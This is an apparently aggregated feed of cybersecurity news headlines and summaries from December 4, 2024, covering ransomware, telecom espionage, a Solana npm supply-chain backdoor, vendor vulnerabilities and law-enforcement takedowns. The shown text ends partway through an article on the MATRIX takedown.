by BleepingComputer
2024-12-04 17:50:00
Europol Dismantles Criminal Messaging Service MATRIX in Major Global TakedownEuropol on Tuesday announced the takedown of an invite-only encrypted messaging service called MATRIX that''s created by criminals for criminal purposes. The joint operation, conducted by French and Dutch authorities under the moniker Passionflower, comes in the aftermath of an investigation that was launched in 2021 after the messaging service was discovered on the phone of a criminal convicted
by The Hacker News
2024-12-04 17:33:00
Shared digital gateway was source of three NHS ransomware attacks
by ComputerWeekly
2024-12-04 17:22:14
FBI, CISA urge Americans to use secure messaging apps in wake of massive cyberattackYour unencrypted RCS messages between iPhones and Android devices can be spied on by foreign attackers. Here''s how to protect yourself.
by ZDNET Security
2024-12-04 17:21:24
Senators say US military is failing to secure its phones from foreign spiesSenators Ron Wyden and Eric Schmitt are demanding the Department of Defense to do more to secure its telecommunications. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 17:20:00
7 PAM Best Practices to Secure Hybrid and Multi-Cloud EnvironmentsAre you using the cloud or thinking about transitioning? Undoubtedly, multi-cloud and hybrid environments offer numerous benefits for organizations. However, the cloud''s flexibility, scalability, and efficiency come with significant risk — an expanded attack surface. The decentralization that comes with utilizing multi-cloud environments can also lead to limited visibility into user activity and
by The Hacker News
2024-12-04 17:00:00
A New Phone Scanner That Detects Spyware Has Already Found 7 Pegasus InfectionsThe mobile device security firm iVerify has been offering a tool since May that makes spyware scanning accessible to anyone—and it’s already turning up victims.
by WIRED Security News
2024-12-04 16:57:21
Senators Warn the Pentagon: Get a Handle on China’s Telecom HackingIn a letter to the Department of Defense, senators Ron Wyden and Eric Schmitt are calling for an investigation into fallout from the Salt Typhoon espionage campaign.
by WIRED Security News
2024-12-04 16:47:25
NHS Ransomware Attack: Russian INC Ransom Gang Steals Patient DataINC Ransom, a Russian-leanguage ransomware group has claimed responsibility for the ransomware attack on two NHS, hospitals.
by Hackread
2024-12-04 16:45:47
At least 8 US companies hit in telecom attack spree, officials sayA deputy national security advisor warned that the China-affiliated Salt Typhoon attack spree potentially infiltrated more telecom companies and the threat group still has network access.
by Cybersecurity Dive
2024-12-04 16:32:38
Preparing for 2025 Cybersecurity Warnings2024 has been a defining year for cybersecurity. The Change Healthcare breach exposed 100+ million sensitive records, while the Crowdstrike incident affected 8.5 million systems and cost Fortune 500 companies $5.4 billion. Ransomware incidents, like the Ticketmaster breach, have also increased, while the Transport for London and NHS hacks revealed critical vulnerabilities in governmental organisations. […] The post Preparing for 2025 Cybersecurity Warnings appeared first on IT Security Guru.
by IT Security Guru
2024-12-04 16:27:22
Supply Chain Attack Hits Solana Core Library, Wallets at RiskA supply chain attack has compromised versions 1.95.6 and 1.95.7 of the @solana/web3.js library, a critical JavaScript tool widely used for building Solana blockchain applications. The library, which sees over 350,000 weekly downloads on npm, contained malicious code that could steal private keys, posing significant risks to developers and end-users. The issue came to light … The post Supply Chain Attack Hits Solana Core Library, Wallets at Risk appeared first on CyberInsider.
by Cyber Insider
2024-12-04 16:26:51
Poor mobile security practices rife at SMEs, CyberSmart survey findsNew research conducted by CyberSmart, a leading provider of SME security solutions, indicates that mobile cybersecurity incidents at small businesses are widespread.   The research, conducted by OnePoll in Autumn 2024, polled 250 small-medium enterprise (SME) business owners or leaders in the UK, found that over a third (35%) of small business employees or owners […] The post Poor mobile security practices rife at SMEs, CyberSmart survey finds appeared first on IT Security Guru.
by IT Security Guru
2024-12-04 16:09:40
Crypto’s rising value likely to bring new wave of scamsThe value of cryptocurrencies is going through the roof, so the scammers are even more interested in your funds
by Malwarebytes Labs
2024-12-04 16:05:00
CISA, FBI urge Americans to use encrypted messaging apps to combat Chinese telco hackersU.S. government officials urged Americans to use encrypted messaging apps to avoid having their communications tapped by Chinese spies. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 16:00:46
UnitedHealthcare CEO Brian Thompson shot and killed in New YorkBrian Thompson, the CEO of UnitedHealthcare, was fatally shot in Midtown Manhattan early Wednesday morning while walking toward the New York Hilton Midtown for his company’s annual investor conference. According to emerging media reports, Thompson was fired on from roughly 20 feet away by a masked gunman, who appeared to be waiting for Thompson, and […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 16:00:00
How to Plan a New (and Improved!) Password Policy for Real-World Security ChallengesMany organizations struggle with password policies that look strong on paper but fail in practice because they''re too rigid to follow, too vague to enforce, or disconnected from real security needs. Some are so tedious and complex that employees post passwords on sticky notes under keyboards, monitors, or desk drawers. Others set rules so loose they may as well not exist. And many simply copy
by The Hacker News
2024-12-04 15:39:10
She Was a Russian Socialite and Influencer. Cops Say She’s a Crypto Laundering KingpinWestern authorities say they’ve identified a network that found a new way to clean drug gangs’ dirty cash. WIRED gained exclusive access to the investigation.
by WIRED Security News
2024-12-04 15:38:00
Phishing attacks surge over 600% in the buildup to Black FridayBlack Friday and Cyber Monday are prime targets for cyber-attacks, as consumer spending rises and threat actors flock to take advantage. Darktrace analysis reveals a surge in retail cyber scams at the opening of the peak 2024 shopping period, and the top brands that scammers love to impersonate. Plus, don’t forget to check out our top tips for holiday-proofing your SOC before you clock off for the festive season.
by Darktrace
2024-12-04 15:37:15
FBI shares tips on how to tackle AI-powered fraud schemesThe FBI warns that scammers are increasingly using artificial intelligence to improve the quality and effectiveness of their online fraud schemes, ranging from romance and investment scams to job hiring schemes. [...]
by BleepingComputer
2024-12-04 15:18:10
UK disrupts Russian money laundering networks used by ransomwareA law enforcement operation led by the United Kingdom''s National Crime Agency (NCA) has disrupted two Russian money laundering networks working with criminals worldwide, including ransomware gangs. [...]
by BleepingComputer
2024-12-04 15:18:00
Researchers Uncover Backdoor in Solana's Popular Web3.js npm LibraryCybersecurity researchers are alerting to a software supply chain attack targeting the popular @solana/web3.js npm library that involved pushing two malicious versions capable of harvesting users'' private keys with an aim to drain their cryptocurrency wallets. The attack has been detected in versions 1.95.6 and 1.95.7. Both these versions are no longer available for download from the npm
by The Hacker News
2024-12-04 15:11:08
Veeam addressed critical Service Provider Console (VSPC) bugVeeam addressed a critical vulnerability in Service Provider Console (VSPC) that could allow remote attackers to execute arbitrary code. Veeam released security updates for a critical vulnerability, tracked as CVE-2024-42448 (CVSS score of 9.9) impacting Service Provider Console. Successful exploitation of the flaw can potentially lead to remote code execution on vulnerable installs. Veeam Service […]
by Security Affairs
2024-12-04 15:03:35
Bypassing WAFs with the phantom $Version cookieHTTP cookies often control critical website features, but their long and convoluted history exposes them to parser discrepancy vulnerabilities. In this post, I''ll explore some dangerous, lesser-known
by PortSwigger Research
2024-12-04 15:00:00
Navigating the Changing Landscape of Cybersecurity RegulationsThe evolving regulatory environment presents both challenges and opportunities for businesses.
by Dark Reading
2024-12-04 14:40:21
Ransomware hackers target NHS hospitals with new cyberattacksTwo NHS trusts in England have been hacked in recent weeks, the latest attacks to hit the national health service. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 14:25:33
Vulnerabilities in ICS: A Detailed Analysis of Recent Security Advisories and ThreatsOverview The recent Weekly Industrial Control System Vulnerability Intelligence Report from Cyble Research & Intelligence Labs (CRIL) covers the vulnerabilities disclosed by the Cybersecurity and Infrastructure Security Agency (CISA) from November 26, 2024, to December 02, 2024. The report sheds light on online threats, especially vulnerabilities affecting critical systems such as those from Schneider Electric and Hitachi Energy, two of the most prominent vendors in the ICS sector. During the report''s timeframe, CISA issued five major security advisories, focusing on 12 vulnerabilities that impact a wide range of ICS products. These vulnerabilities have been identified in devices and systems from key vendors, including Schneider Electric and Hitachi Energy. The vulnerabilities identified in these systems are critical to address due to their potential to expose vital infrastructures to cyberattacks. Schneider Electric: A Major Focus for ICS Vulnerabilities Schneider Electric, a leading vendor of control systems, was prominently featured in the advisories due to the numerous vulnerabilities impacting their devices. These vulnerabilities range from issues with weak password recovery mechanisms to the use of hard-coded credentials, both of which pose a risk to the integrity of ICS devices. Among the affected products is the PM5560 series, which includes multiple versions susceptible to vulnerabilities like weak password recovery mechanisms for forgotten passwords (CVE-2021-22763). This flaw, coupled with improper authentication (CVE-2021-22764), increases the potential for unauthorized access. Such vulnerabilities undermine the effectiveness of ICS security, allowing attackers to potentially take control over critical systems like actuators, sensors, and power supplies. One particularly concerning vulnerability (CVE-2023-6408) affects the Modicon M340 CPU and other related Schneider Electric products. This vulnerability arises from improper message integrity enforcement during transmission across communication channels, which could allow attackers to manipulate the integrity of communications between devices, creating openings for man-in-the-middle attacks. The high-severity nature of this vulnerability highlights the ongoing need for organizations to implement stronger security practices, including effective patch management and encryption protocols. Additionally, Schneider Electric''s use of hard-coded credentials (CVE-2023-6409) in its devices presents a high-risk issue, making it easier for attackers to gain access to systems. This particular vulnerability is found in several product lines, including the Modicon M580 and Modicon M340 CPUs, which are integral to many ICS operations. These devices are widely used in critical sectors such as energy and manufacturing. Hitachi Energy: Security Flaws in SCADA and Control Systems Another major player in the ICS sector, Hitachi Energy, also faced critical security challenges during the same reporting period. The vulnerabilities affecting Hitachi''s MicroSCADA Pro/X SYS600 system are especially concerning because they affect key operational components within control systems and supervisory control and data acquisition (SCADA) environments. These vulnerabilities could allow attackers to bypass authentication (CVE-2024-3982), potentially gaining unauthorized access to control systems that are vital for managing electricity grids and other industrial processes. Additionally, path traversal vulnerabilities (CVE-2024-3980) were identified, which could allow an attacker to manipulate file paths within the system, gaining unauthorized access to sensitive files. These vulnerabilities are classified as high and critical risks, as they could be exploited by attackers to infiltrate ICS systems, causing online disruption to operations. A notable vulnerability in Hitachi Energy’s systems is the authentication bypass by the capture-replay flaw (CVE-2024-3982), which allows attackers to bypass authentication mechanisms by replaying captured credentials. Given the high-security requirements of control systems like SCADA, the existence of this vulnerability calls for immediate attention from organizations to ensure these critical systems remain secure. The MicroSCADA Pro/X SYS600 system is also affected by a missing authentication for critical functions (CVE-2024-7940) vulnerability. This flaw could enable attackers to exploit critical functions within the system without proper authentication, allowing them to manipulate system settings or gain unauthorized access to sensitive data. The Severity of ICS Vulnerabilities The vulnerabilities analyzed in the CRIL report show that the majority of the vulnerabilities in ICS systems fall under high severity. This highlights the critical need for organizations operating ICS devices to adopt proactive cybersecurity measures. Weak passwords, improper authentication, and hard-coded credentials are among the most common issues found across various ICS products. Addressing these vulnerabilities requires rigorous patch management practices, including regular updates and configuration checks. The vulnerabilities disclosed by CISA and highlighted in the report are particularly important as they impact critical infrastructure sectors such as energy, critical manufacturing, and communications. Schneider Electric and Hitachi Energy alone account for a notable portion of the vulnerabilities in the ICS space, underlining the need for greater focus on security within the industrial sector. Impact on Critical Infrastructure Sectors A sector-wise analysis of the vulnerabilities reveals that Critical Manufacturing accounts for the largest portion of vulnerabilities, with an overwhelming 83.3% of the cases. This is due to the expansive operations and critical nature of manufacturing processes that rely heavily on ICS. In contrast, the Energy sector, which includes power grids and electrical infrastructure, accounts for 8.3% of the reported vulnerabilities, while the Wastewater Systems sector is also impacted with a similar share. The Commercial Facilities sector reports the smallest share, with only 0.8% of the vulnerabilities. This distribution denotes the varied risk levels across critical infrastructure sectors and emphasizes the importance of prioritizing cybersecurity efforts, particularly in manufacturing and energy, where ICS vulnerabilities could lead to more severe consequences. Mitigation Strategies and Recommendations Here are some of the best practices recommended to mitigate potential risks: It is essential to regularly update systems and apply patches as soon as they are released. Many vulnerabilities in ICS are a result of outdated software or firmware, which can be addressed by keeping systems up to date. Implementing a zero-trust security model is crucial in preventing unauthorized access. This involves treating every request for access as if it originates from an untrusted source, requiring strict verification before granting access. By segmenting networks, organizations can limit the ability of attackers to move laterally across systems, thus reducing the risk of widespread damage. Strengthening authentication protocols, such as using multi-factor authentication (MFA), is critical to reducing the likelihood of unauthorized access to ICS devices. Continuous security assessments through vulnerability scans, penetration testing, and audits help identify potential security gaps in ICS before they can be exploited by attackers. Organizations should invest in cybersecurity training programs for employees to ensure they are aware of the risks posed by phishing, social engineering, and other attack methods. Conclusion The vulnerabilities in ICS highlighted in the latest report from CISA, along with those analyzed by Cyble Research & Intelligence Labs, highlight the increasing risks faced by critical infrastructure sectors. With vulnerabilities in high-severity products from vendors like Schneider Electric and Hitachi Energy, it is important that organizations address these potential threats before they can compromise sensitive information. By implementing security measures, including effective patch management, strong authentication protocols, and comprehensive training programs, organizations can better protect their ICS systems from cybersecurity risks. The post Vulnerabilities in ICS: A Detailed Analysis of Recent Security Advisories and Threats appeared first on Cyble.
by CYBLE
2024-12-04 14:25:23
New Android Malware DroidBot Targets Banking Users in EuropeCybersecurity researchers from Cleafy have identified a sophisticated new Android Remote Access Trojan (RAT) called DroidBot. First detected in late October 2024, with traces of activity dating back to June, DroidBot is a Malware-as-a-Service (MaaS) operation, providing advanced tools for surveillance and fraud targeting financial and governmental institutions across Europe. Cleafy’s Threat Intelligence and Research … The post New Android Malware DroidBot Targets Banking Users in Europe appeared first on CyberInsider.
by Cyber Insider
2024-12-04 14:22:56
Upgrade your Sophos Firewall to v21 todayGet the most from your Sophos Firewall.
by Sophos News
2024-12-04 14:12:31
Australia’s ACSC and ASD Team Up with CISA, NSA, FBI, and International Allies to Protect Communications InfrastructureOverview A coalition of cybersecurity agencies, including the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), Australia’s Australian Signals Directorate (ASD), the Australian Cyber Security Centre (ACSC), as well as counterparts from Canada and New Zealand, has issued a hardening guidance to strengthen communications infrastructure against cyber espionage and other malicious cyber activities. This hardening guidance focuses on visibility enhancements and hardening practices for network devices. It aims to help engineers and defenders safeguard their systems from the growing threats posed by China-affiliated threat actors. The latest intelligence reports reveal that Chinese hackers have compromised networks of major telecommunications providers globally, conducting extensive cyber espionage campaigns. These groups have been targeting vulnerabilities in telecommunications networks, gaining unauthorized access to sensitive data. This activity aligns with known weaknesses in existing network infrastructure and highlights the urgent need for organizations to address security gaps. The agencies involved in this effort, including the ASD and the ACSC, emphasize that while the tactics used by these threat actors are not novel, their success stems from exploiting well-established vulnerabilities in communications infrastructure. The newly issued hardening guidance, therefore, provides actionable steps for network engineers and defenders to strengthen visibility, detect malicious activities, and harden systems against future exploitation. Hardening Guidance: Enhancing Visibility in Communications Networks One key strategy in this guidance is to improve visibility across communication networks. For organizations to effectively monitor, detect, and respond to cyber threats, they must have thorough insight into network traffic, user behavior, and overall data flow. High visibility enables swift identification of anomalies that may indicate a cyber intrusion, allowing defenders to take immediate action. Monitoring Network Configurations and Changes Network engineers are advised to closely monitor configuration changes in critical network devices, such as routers, switches, and firewalls. Any alterations outside the formal change management process should raise red flags. Additionally, regular audits and monitoring for unusual activities, such as unauthorized changes to routes or protocols, can help detect malicious intrusions early. Centralized Configuration Management The guidance recommends centralizing configurations and storing them in a secure, centralized location. This prevents devices from becoming the sole source of truth for their own configurations, which could be manipulated in the event of a breach. Network engineers should also implement strong network flow monitoring solutions to gain insights into the ingress and egress points of data across the network. Monitoring Accounts and Logging A proactive approach to monitoring user accounts and logins is also essential for mitigating threats. Monitoring anomalies in user and service account activity—such as abnormal login times, failed login attempts, or logins from unexpected locations—can help identify malicious actors who have gained unauthorized access to the network. Organizations should also ensure that logging mechanisms are vigorous, secure, and centralized. Logs should be encrypted in transit and stored off-site to prevent tampering. Using Security Information and Event Management (SIEM) systems is encouraged to help analyze logs and correlate data from various devices for rapid incident detection. Hardening Network Systems Beyond improving visibility, securing the underlying network systems through hardening is a critical defense strategy. Hardening aims to reduce vulnerabilities by ensuring that network devices and protocols are securely configured to minimize the attack surface. The collaboration between CISA, ACSC, and other agencies has provided valuable hardening guidance that organizations can apply to their communications infrastructure. Isolated Management Networks One of the most critical recommendations in the guide is the use of out-of-band management networks. By ensuring that network infrastructure devices can only be managed from physically separate, trusted networks, organizations can prevent the lateral movement of hackers within their systems. This isolation limits the potential impact of a breach, as attackers cannot easily move between devices on the network once one device has been compromised. Segmentation and Access Control Segmentation of networks into isolated zones, such as using Virtual Local Area Networks (VLANs) and private VLANs (PVLANs), helps protect critical systems and restricts access to sensitive data. Access Control Lists (ACLs) should be configured with a default-deny policy to control both inbound and outbound traffic, ensuring that only authorized connections are allowed. Securing Virtual Private Networks (VPNs) The guidance stresses the importance of securing VPN gateways by limiting their exposure to the internet and enforcing strong cryptographic protocols for key exchange and data encryption. VPNs should be configured to only allow strong authentication methods, and unused cryptographic algorithms should be disabled to reduce the risk of exploitation. Proactive Authentication and Account Management In addition to securing network devices, organizations should focus on improving authentication methods to ensure that only authorized users can access their networks. Implementing phishing-resistant multi-factor authentication (MFA) for all users, especially those with administrative privileges, is one of the primary strategies to prevent unauthorized access. The guidance also emphasizes the importance of strong password policies, including the use of secure hashing algorithms and the requirement to change default passwords immediately upon deployment. Additionally, organizations should regularly review user accounts to ensure that inactive or unnecessary accounts are removed, and all accounts are assigned the minimum necessary permissions. Conclusion Adopting a ""secure by design"" approach is crucial for software manufacturers to enhance the security of their products and reduce the need for customers to manually implement hardening measures. As cyber threats, especially Chinese threat actors, continue to target global organizations, collaboration between international agencies like CISA, ACSC, and other stakeholders is important to protect global communications infrastructure. Australia''s leadership, through agencies such as the ASD and ACSC, plays an important role in fighting cybercrime. By focusing on hardening guidance, improving visibility, and working together internationally, organizations can strengthen their security posture, mitigate vulnerabilities, and contribute to the collective global effort to protect digital life. The post Australia’s ACSC and ASD Team Up with CISA, NSA, FBI, and International Allies to Protect Communications Infrastructure appeared first on Cyble.
by CYBLE
2024-12-04 14:11:12
FBI: Criminals Exploit Generative AI for Sophisticated Fraud SchemesThe FBI’s Internet Crime Complaint Center (IC3) has issued a public service announcement highlighting the growing use of generative artificial intelligence (AI) by criminals to enhance the scale, believability, and reach of fraudulent activities. These AI tools, designed to create realistic synthetic content, are being weaponized for schemes involving social engineering, financial fraud, identity theft, … The post FBI: Criminals Exploit Generative AI for Sophisticated Fraud Schemes appeared first on CyberInsider.
by Cyber Insider
2024-12-04 14:08:45
U.S. Offered $10M for Hacker Just Arrested by RussiaIn January 2022, KrebsOnSecurity identified a Russian man named Mikhail Matveev as ""Wazawaka,"" a cybercriminal who was deeply involved in the formation and operation of multiple ransomware groups. The U.S. government indicted Matveev as a top ransomware purveyor a year later, offering $10 million for information leading to his arrest. Last week, the Russian government reportedly arrested Matveev and charged him with creating malware used to extort companies.
by Krebs on Security
2024-12-04 14:01:11
Digital Certificates With Shorter Lifespans Reduce Security VulnerabilitiesProposals from Google and Apple drastically reduce the life cycle of certificates, which should mean more oversight — and hopefully better control.
by Dark Reading
2024-12-04 14:00:23
Business leaders among Pegasus spyware victims, says security firmThe mobile security company said it detected Pegasus spyware attacks on seven iPhone owners, including government officials and a business leader. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 14:00:00
Cloud threat report: Possible trend in cloud credential “oversaturation”For years now, the dark web has built and maintained its own evolving economy, supported by the acquisition and sales of stolen data, user login credentials and business IP. But much like any market today, the dark web economy is subject to supply and demand. A recent X-Force Cloud Threat Landscape Report has shed light […] The post Cloud threat report: Possible trend in cloud credential “oversaturation” appeared first on Security Intelligence.
by Security Intelligence
2024-12-04 14:00:00
Linux Foundation report highlights the true state of open source libraries in production appsThere are many metrics to track the prevalence of open source components, such as GitHub stars and downloads, but they don’t paint the full picture of how they’re being used in production codebases. Census III of Free and Open Source Software: Application Libraries leans on more than 12 million data points from software composition analysis […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 13:00:00
Tuskira unifies and optimizes disparate cybersecurity toolsCyberattacks are on the rise, and the victims are high-profile. According to a KPMG survey, close to half of companies with $1 billion or more in annual revenue recently suffered a security breach. Surprisingly, an overabundance of security tools may be contributing to the problem. In a separate poll, 43% of businesses said their teams […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 12:42:41
Your team’s next TTX (probably) isn’t realistic enough to prep for attacks. Here's whyWe’ve seen how traditional TTXs create a loop of rehearsed scenarios and safe assumptions, leaving organizations vulnerable to threats that don’t play by the rules. Enter Crisis Control…
by Hack The Box Blog
2024-12-04 12:41:20
From Phishing to Passwords: How Azercell is Educating Seniors About Cyber ThreatsAzercell, the leading mobile operator in Azerbaijan, is offering cybersecurity training to its customers, particularly the elderly. As part of its ongoing efforts, Azercell cybersecurity training for residents of a social service institution for the elderly. The training aimed to equip this senior generation with the knowledge and tools necessary to understand digital life and how to protect themselves. The Azercell cybersecurity training was conducted by experts from Azercell''s Information Security Department. The training sessions focused on educating the participants about the growing threat of cyber fraud, phishing attacks, and the various methods online fraudsters use to deceive and exploit individuals. As part of the program, attendees were taught practical strategies for protecting their personal data, raising awareness about the importance of being cautious while engaging in online activities. Key Highlights of the Azercell Cybersecurity Training One of the key elements of the ""Azercell security training"" was its focus on real-world scenarios, helping the elderly participants identify common online scams and cyber threats. The training also covered modern cyber-attack methods, ensuring that the senior citizens could recognize and avoid potential dangers in their digital interactions. The importance of strong passwords, the risks of sharing sensitive information on social media, and how to verify the authenticity of emails and websites were among the critical topics addressed during the session. An imporant part of the training program was dedicated to an interactive Q&A session, where attendees had the opportunity to ask specific questions and receive personalized advice on their concerns. This segment allowed the elderly participants to clarify doubts, ensuring that they left the session feeling more confident in their ability to protect themselves online. In addition to the informative training, Azercell volunteers, known as ""Azercell Könüllüləri,"" participated actively in the event. The volunteers engaged with the attendees, offering additional support and distributing thoughtful gifts to the participants. This added a personal touch to the event, making it not only educational but also enjoyable for the elderly citizens. Azercell’s initiative is part of the company’s broader efforts to promote digital literacy across various demographics, with a special focus on vulnerable groups such as the elderly. By organizing these ""Azercell training for cybersecurity"" sessions, the company is working towards building a safer and more informed digital community. These initiatives reflect Azercell’s responsibility to protect its customers and contribute to a safer online environment for everyone, regardless of their age or technological experience. CISA’s Cybersecurity Training for Diverse Groups In a similar vein, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also launched initiatives aimed at enhancing cybersecurity training for diverse groups. CISA''s new learning platform, CISA Learning, provides free online courses to federal employees, contractors, military personnel, and the general public, emphasizing topics such as ethical hacking, cloud security, and malware analysis. Empowering individuals with the knowledge to defend themselves against cyber-attacks is a vital step in reducing the overall risk of digital exploitation. Likewise, CISA''s expanded training programs aim to equip individuals with the skills to recognize and mitigate cyber risks, ensuring they are prepared to tackle a wide array of online threats. Through programs like these, Azercell is helping ensure that senior citizens are not left behind in the digital age. With more people relying on online services for everything from communication to banking, understanding the potential dangers of the internet is crucial. The training offered by Azercell is designed to be both accessible and relevant, addressing the unique challenges faced by older adults when interacting with technology. In parallel, CISA’s platform allows learners of all levels, from beginners to advanced, to gain critical skills in various cybersecurity domains, ensuring that everyone, regardless of their background, has access to the tools they need to stay safe online.
by The Cyber Express
2024-12-04 12:32:00
The most pressing challenges for CISOs and cyber security teams
by ComputerWeekly
2024-12-04 12:00:00
10 Ways To Harden Your Linux Containers Against AttacksLearn practical strategies for protecting containerized applications on Linux.
by ITPro Today
2024-12-04 11:37:00
Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom NetworksA joint advisory issued by Australia, Canada, New Zealand, and the U.S. has warned of a broad cyber espionage campaign undertaken by People''s Republic of China (PRC)-affiliated threat actors targeting telecommunications providers. ""Identified exploitations or compromises associated with these threat actors'' activity align with existing weaknesses associated with victim infrastructure; no novel
by The Hacker News
2024-12-04 11:04:00
Veeam Issues Patch for Critical RCE Vulnerability in Service Provider ConsoleVeeam has released security updates to address a critical flaw impacting Service Provider Console (VSPC) that could pave the way for remote code execution on susceptible instances. The vulnerability, tracked as CVE-2024-42448, carries a CVSS score of 9.9 out of a maximum of 10.0. The company noted that the bug was identified during internal testing. ""From the VSPC management agent machine, under
by The Hacker News
2024-12-04 11:00:30
Healthcare Cybersecurity in 2024: Building a Better Defence Against Rising Costs and ThreatsCybersecurity in the healthcare industry often faces a persistent and well-known dilemma. While the industry continues to be a major target for cybercrime, healthcare organizations have significant challenges in protecting sensitive patient data and maintaining continuity of operations with their limited budget. This blog discusses the state of cybersecurity in healthcare based on findings from the Picus Blue Report 2024, IBM''s Cost of a Data Breach Report, and other leading sources to give actionable insights and help organizations enhance their defenses.
by Picus Security
2024-12-04 11:00:17
FTC says AI company Evolv 'falsely hyped'' its security scannersEvolv''s scanners don''t work as well as it led schools to believe. Here''s what that means for children''s safety.
by ZDNET Security
2024-12-04 10:55:00
Threat Spotlight: Phishing techniques to look out for in 2025In this blog post Barracuda threat analysts look at how advanced phishing techniques are likely to evolve in 2025.
by Barracuda
2024-12-04 10:38:00
Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized AccessA critical security vulnerability has been disclosed in SailPoint''s IdentityIQ identity and access management (IAM) software that allows unauthorized access to content stored within the application directory. The flaw, tracked as CVE-2024-10905, has a CVSS score of 10.0, indicating maximum severity. It affects IdentityIQ versions 8.2. 8.3, 8.4, and other previous versions. IdentityIQ ""allows
by The Hacker News
2024-12-04 10:18:00
Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email DefensesCybersecurity researchers have called attention to a novel phishing campaign that leverages corrupted Microsoft Office documents and ZIP archives as a way to bypass email defenses. ""The ongoing attack evades #antivirus software, prevents uploads to sandboxes, and bypasses Outlook''s spam filters, allowing the malicious emails to reach your inbox,"" ANY.RUN said in a series of posts on X. The
by The Hacker News
2024-12-04 10:10:00
Post-COVID IT Hiring: Shifts in Workplace Culture, Technology, and LawThe IT labor market has evolved from an employee-driven landscape to one where employers regain control, reshaping hiring, remote work, and training strategies.
by ITPro Today
2024-12-04 10:04:47
Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networksAustralia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks in a joint advisory. Australia, Canada, New Zealand, and the U.S. issued a joint advisory to warn of People’s Republic of China (PRC)-linked cyber espionage targeting telecom networks. “The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal […]
by Security Affairs
2024-12-04 10:00:37
Kaspersky Security Bulletin 2024. StatisticsThe ""Kaspersky Security Bulletin 2024. Statistics"" report contains statistics on cyberthreats for the period from November 2023 through October 2024. It covers such threats as financial malware, ransomware, miners, malware for IoT and macOS, vulnerabilities and others.
by Securelist
2024-12-04 08:45:00
Fraud loss numbers are all over the place. The one sure thing is they’re rising fast.A February 2024 report from the FTC reveals that Americans lost more than $10 billion dollars to scammers of all kinds during 2023. Learn more about this shocking statistic in this blog.
by Barracuda
2024-12-04 08:43:00
Ascension reduces operating loss as it rebounds from cyberattackA sweeping cyberattack this spring took the provider’s electronic health record offline for weeks and led to significant losses.
by Cybersecurity Dive
2024-12-04 08:35:00
Feds raise alarm on China-linked infiltration of telecom networksSalt Typhoon gained access to many telecom networks and stole large amounts of data, including audio and text of targeted people involved in government or politics.
by Cybersecurity Dive
2024-12-04 08:15:00
CISA, German cyber authorities warn Zyxel firewalls facing active exploitationAttackers have targeted dozens of companies with Helldown ransomware, researchers found.
by Cybersecurity Dive
2024-12-04 08:06:02
Europol Dismantles MATRIX: The Encrypted Messaging Service Fueling Global CrimeOn December 3rd, 2024, Europol announced that a joint investigation between French and Dutch law enforcement authorities had successfully dismantled an encrypted messaging service used by criminals. The platform, known as MATRIX, had been facilitating various serious crimes, including international drug trafficking, arms trafficking, and money laundering. The operation, which was coordinated by law enforcement across several European countries, resulted in the seizure of over 40 servers, the arrest of multiple suspects, and the interception of millions of criminal messages. The investigation was a major step forward in combating the use of encrypted platforms for illegal activities. MATRIX: A Sophisticated Criminal Platform MATRIX, a messaging platform made by criminals for criminals, was first discovered on the phone of a convicted criminal involved in the 2021 murder of Dutch investigative journalist Peter R. de Vries. The journalist had gained fame for his work covering unsolved crimes. This discovery led Dutch authorities to initiate an extensive investigation into the platform, which was found to be more complex and sophisticated than other similar platforms such as Sky ECC and EncroChat. Unlike many encrypted communication services, MATRIX requires users to be invited in order to join the platform. It offered a range of encrypted features, including secure messaging, voice and video calls, and even anonymous web browsing. MATRIX also had its own currency system for users to pay for subscriptions, and its platform was primarily used on Google Pixel phones. This level of sophistication and exclusivity made it a popular choice among criminals. The Role of International Cooperation The dismantling of MATRIX highlights the importance of international cooperation in the fight against organized crime. Authorities from France, the Netherlands, Germany, Italy, Lithuania, and Spain worked together as part of a joint investigation team (JIT) coordinated through Eurojust. This cross-border collaboration allowed law enforcement agencies to exchange vital information and swiftly take coordinated action. For three months, investigators monitored activity on the platform, deciphering over 2.3 million messages in 33 different languages. The intercepted communications provided valuable intelligence, linking MATRIX users to various criminal activities. These included international drug smuggling, arms deals, and large-scale money laundering schemes. On December 3rd, the operation led to the takedown of the platform’s servers located across France and Germany. Additionally, authorities conducted raids in multiple countries, arresting three individuals. One suspect, identified as the suspected owner and operator of MATRIX, a 52-year-old Lithuanian national, was apprehended in Spain. He had been working closely with a 30-year-old man from the Netherlands to run the platform. Significant Seizures and Evidence During the raids, police seized €145,000 ($152,000) in cash and approximately €500,000 ($527,000) in cryptocurrencies. Authorities also confiscated four vehicles, more than 970 mobile phones, and other equipment. The evidence collected during the operation will be crucial in ongoing investigations into the criminals who used MATRIX to facilitate illegal activities. In addition to the physical evidence, the seizure of the platform’s servers provided law enforcement with a significant opportunity to collect data related to the communications and transactions conducted via MATRIX. A splash page now appears on the platform’s website, alerting users that their messages were intercepted by authorities. The page includes a warning: “It’s not the first time and will not be the last time we are able to read the messages in real time."" Law Enforcement Involved The dismantling of MATRIX involved the coordinated efforts of several European law enforcement agencies, including: France: JUNALCO National Jurisdiction against Organised Crime; OFAC National Police Cybercrime Division Netherlands: Team High Tech Crime of the National Investigations; Special Operations (NIS) of the Netherlands Police; Netherlands Public Prosecution Service Germany: Frankfurt am Main Public Prosecutor General''s Office – ZIT; German Federal Criminal Police, Serious and Organised Crime Division Italy: National Antimafia Directorate (D.N.A.); Central Directorate for Anti-Drug Services (D.C.S.A.) Lithuania: Prosecutor General’s Office; 